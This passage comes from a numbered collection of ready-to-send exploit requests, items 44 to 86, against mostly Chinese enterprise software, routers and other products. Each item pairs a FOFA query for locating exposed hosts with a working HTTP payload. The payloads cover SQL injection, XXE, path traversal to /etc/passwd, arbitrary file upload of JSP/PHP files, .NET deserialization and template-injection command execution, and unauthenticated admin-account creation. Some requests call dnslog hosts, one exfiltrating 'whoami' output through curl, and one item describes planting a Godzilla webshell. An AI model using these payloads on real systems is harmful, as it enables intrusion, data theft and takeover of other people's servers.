<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达 天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

